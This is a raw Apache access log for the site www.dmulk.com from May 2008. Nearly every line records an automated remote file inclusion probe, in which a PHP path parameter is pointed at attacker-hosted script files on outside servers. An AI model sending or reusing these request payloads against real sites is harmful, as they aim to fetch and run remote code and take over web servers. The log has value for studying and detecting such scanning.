217.147.239.5 - - [29/May/2008:10:14:18 -0700] "GET /logs/access_080303.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.6.123.99 - - [29/May/2008:10:14:18 -0700] "GET /logs//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:10:14:23 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:10:14:29 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.30.73.117 - - [29/May/2008:10:14:31 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
200.30.73.117 - - [29/May/2008:10:14:32 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
72.18.155.74 - - [29/May/2008:10:14:33 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [29/May/2008:10:14:33 -0700] "GET //config/dbutil.bck.php?confdir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [29/May/2008:10:14:33 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.114.133.81 - - [29/May/2008:10:14:38 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.81 - - [29/May/2008:10:14:40 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.112.2 - - [29/May/2008:10:14:43 -0700] "GET /logs/access_080315.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.53.226 - - [29/May/2008:10:14:55 -0700] "GET /logs/access_080109.log//index.php?abs_path=http://www.madnessguild.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [29/May/2008:10:14:58 -0700] "GET //index.php?abs_path=http://www.madnessguild.com/ids.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [29/May/2008:10:14:59 -0700] "GET /logs//index.php?abs_path=http://www.madnessguild.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [29/May/2008:10:15:01 -0700] "GET /logs/access_080109.log//index.php?abs_path=http://www.madnessguild.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [29/May/2008:10:15:03 -0700] "GET //index.php?abs_path=http://www.madnessguild.com/ids.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [29/May/2008:10:15:04 -0700] "GET /logs//index.php?abs_path=http://www.madnessguild.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:10:15:17 -0700] "GET /logs/access_080315.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.62.26.18 - - [29/May/2008:10:15:32 -0700] "GET /logs/access.log/main.php?x=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.200.228.241 - - [29/May/2008:10:15:40 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:10:15:42 -0700] "GET /logs//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:10:15:43 -0700] "GET //appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.118.97.147 - - [29/May/2008:10:15:45 -0700] "GET /logs/access_080305.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.118.97.147 - - [29/May/2008:10:15:45 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.118.97.147 - - [29/May/2008:10:15:45 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.33.45 - - [29/May/2008:10:16:16 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.33.45 - - [29/May/2008:10:16:16 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.33.45 - - [29/May/2008:10:16:16 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
216.118.97.147 - - [29/May/2008:10:16:17 -0700] "GET /logs/access_080310.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.33.45 - - [29/May/2008:10:16:20 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.33.45 - - [29/May/2008:10:16:20 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.33.45 - - [29/May/2008:10:16:20 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:10:16:24 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:10:16:45 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.15.88.10 - - [29/May/2008:10:16:49 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.112.2 - - [29/May/2008:10:16:52 -0700] "GET /logs/access_080401.log//ashnews.php?pathtoashnews=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.118.97.147 - - [29/May/2008:10:17:12 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.93.62.112 - - [29/May/2008:10:17:33 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.112 - - [29/May/2008:10:17:33 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.112 - - [29/May/2008:10:17:34 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:10:17:34 -0700] "GET /logs/access_080205.log//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.86.101.159 - - [29/May/2008:10:17:38 -0700] "GET /logs/access_080103.log//modules/xfsection/modify.php?dir_module=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:10:17:45 -0700] "GET /logs//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.62.26.18 - - [29/May/2008:10:17:49 -0700] "GET /logs/access_080216.log/main.php?x=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.158.195.132 - - [29/May/2008:10:17:53 -0700] "GET //citywriter/head.php?path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:10:17:58 -0700] "GET //appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.94.38.182 - - [29/May/2008:10:18:09 -0700] "GET /index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 5001 "-" "libwww-perl/5.65" "www.dmulk.com"
66.90.73.127 - - [29/May/2008:10:18:23 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://amsny.org/site/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.90.73.127 - - [29/May/2008:10:18:24 -0700] "GET //skin/zero_vote/error.php?dir=http://amsny.org/site/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.87.22.58 - - [29/May/2008:10:18:28 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
70.168.36.247 - - [29/May/2008:10:18:30 -0700] "GET /logs/index.php?redir=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.168.36.247 - - [29/May/2008:10:18:49 -0700] "GET /index.php?redir=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
74.86.101.159 - - [29/May/2008:10:18:50 -0700] "GET /logs/access_080201.log//modules/xfsection/modify.php?dir_module=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.89.145.82 - - [29/May/2008:10:19:09 -0700] "GET //appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.224.83 - - [29/May/2008:10:19:11 -0700] "GET /logs/%3CBug%3Ehttp://www.science-lausd.net///upload/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
64.13.224.83 - - [29/May/2008:10:19:12 -0700] "GET /%3CBug%3Ehttp://www.science-lausd.net///upload/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
72.18.155.74 - - [29/May/2008:10:19:25 -0700] "GET /logs/access_080421.log//config/dbutil.bck.php?confdir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.53.226 - - [29/May/2008:10:19:28 -0700] "GET /logs/access_080212.log//index.php?abs_path=http://www.madnessguild.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [29/May/2008:10:19:28 -0700] "GET /logs/access_080212.log//index.php?abs_path=http://www.madnessguild.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.33.45 - - [29/May/2008:10:19:37 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.33.45 - - [29/May/2008:10:19:37 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
70.168.36.247 - - [29/May/2008:10:19:42 -0700] "GET /logs/access_080327.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.112.2 - - [29/May/2008:10:19:47 -0700] "GET /logs/access_080309.log//newspublish/include.php?path%5Bdocroot%5D=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.112.2 - - [29/May/2008:10:19:48 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.112.2 - - [29/May/2008:10:19:48 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.112.2 - - [29/May/2008:10:19:54 -0700] "GET /logs/access_080219.log//newspublish/include.php?path%5Bdocroot%5D=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/May/2008:10:20:09 -0700] "GET /logs/access_080118.log/classes/core/language.php?rootdir=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/May/2008:10:20:09 -0700] "GET /classes/core/language.php?rootdir=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/May/2008:10:20:10 -0700] "GET /logs/classes/core/language.php?rootdir=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.175.155 - - [29/May/2008:10:20:31 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.nationsiam.com/components/com_akogallery/img_pictures/love.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
75.126.175.155 - - [29/May/2008:10:20:31 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.nationsiam.com/components/com_akogallery/img_pictures/love.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.228.241 - - [29/May/2008:10:20:42 -0700] "GET /logs/access_080221.log//agendax/addevent.inc.php?agendax_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.200.228.241 - - [29/May/2008:10:20:42 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.200.228.241 - - [29/May/2008:10:20:42 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.118.97.147 - - [29/May/2008:10:20:45 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.118.97.147 - - [29/May/2008:10:20:45 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.18.229 - - [29/May/2008:10:20:48 -0700] "GET /logs/access_080306.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:10:20:58 -0700] "GET /logs/access_080209.log//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.34.68.43 - - [29/May/2008:10:21:00 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://scaneru.nm.ru/idv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.68.43 - - [29/May/2008:10:21:01 -0700] "GET /logs/access_080305.log//newspublish/include.php?path%5Bdocroot%5D=http://scaneru.nm.ru/idv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.68.43 - - [29/May/2008:10:21:05 -0700] "GET /logs/access_080315.log//newspublish/include.php?path%5Bdocroot%5D=http://scaneru.nm.ru/idv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.68.43 - - [29/May/2008:10:21:05 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://scaneru.nm.ru/idv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.112 - - [29/May/2008:10:21:19 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.103.131 - - [29/May/2008:10:21:37 -0700] "GET //index.php?error=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
194.158.195.132 - - [29/May/2008:10:22:08 -0700] "GET /logs/access.log//citywriter/head.php?path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.158.195.132 - - [29/May/2008:10:22:09 -0700] "GET //citywriter/head.php?path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.158.195.132 - - [29/May/2008:10:22:09 -0700] "GET /logs//citywriter/head.php?path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
134.169.32.252 - - [29/May/2008:10:22:38 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
134.169.32.252 - - [29/May/2008:10:22:38 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
206.246.17.60 - - [29/May/2008:10:22:47 -0700] "GET /logs/access_080201.log//index.php?pagina=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.246.17.60 - - [29/May/2008:10:22:48 -0700] "GET /logs//index.php?pagina=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.246.17.60 - - [29/May/2008:10:22:50 -0700] "GET //index.php?pagina=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
200.62.215.228 - - [29/May/2008:10:22:50 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.246.17.60 - - [29/May/2008:10:22:50 -0700] "GET /logs//index.php?pagina=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.62.215.228 - - [29/May/2008:10:22:52 -0700] "GET //include/lib.inc.php?site_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.240.250.130 - - [29/May/2008:10:22:53 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.240.250.130 - - [29/May/2008:10:22:54 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.240.250.130 - - [29/May/2008:10:22:55 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.246.17.60 - - [29/May/2008:10:23:03 -0700] "GET /logs/access_080201.log//index.php?pagina=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.246.17.60 - - [29/May/2008:10:23:08 -0700] "GET //index.php?pagina=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
200.62.215.228 - - [29/May/2008:10:23:14 -0700] "GET /logs//include/lib.inc.php?site_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.158.195.132 - - [29/May/2008:10:23:19 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.29.32.2 - - [29/May/2008:10:23:25 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [29/May/2008:10:23:26 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.87.22.58 - - [29/May/2008:10:23:33 -0700] "GET /logs/access_080216.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
65.87.22.58 - - [29/May/2008:10:23:33 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
65.87.22.58 - - [29/May/2008:10:23:33 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.106.28.93 - - [29/May/2008:10:23:55 -0700] "GET /classes/adodbt/sql.php?classes_dir=http://www.gameheros.org/WebAdmin/phpmailer/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.240.250.130 - - [29/May/2008:10:23:59 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.240.250.130 - - [29/May/2008:10:24:00 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.240.250.130 - - [29/May/2008:10:24:00 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.245.144.89 - - [29/May/2008:10:24:07 -0700] "GET /logs/index.php?get=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
77.245.144.89 - - [29/May/2008:10:24:15 -0700] "GET /index.php?get=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
213.240.250.130 - - [29/May/2008:10:24:15 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.99.192.29 - - [29/May/2008:10:24:17 -0700] "GET /logs/index.php?get=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
62.99.192.29 - - [29/May/2008:10:24:17 -0700] "GET /index.php?get=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
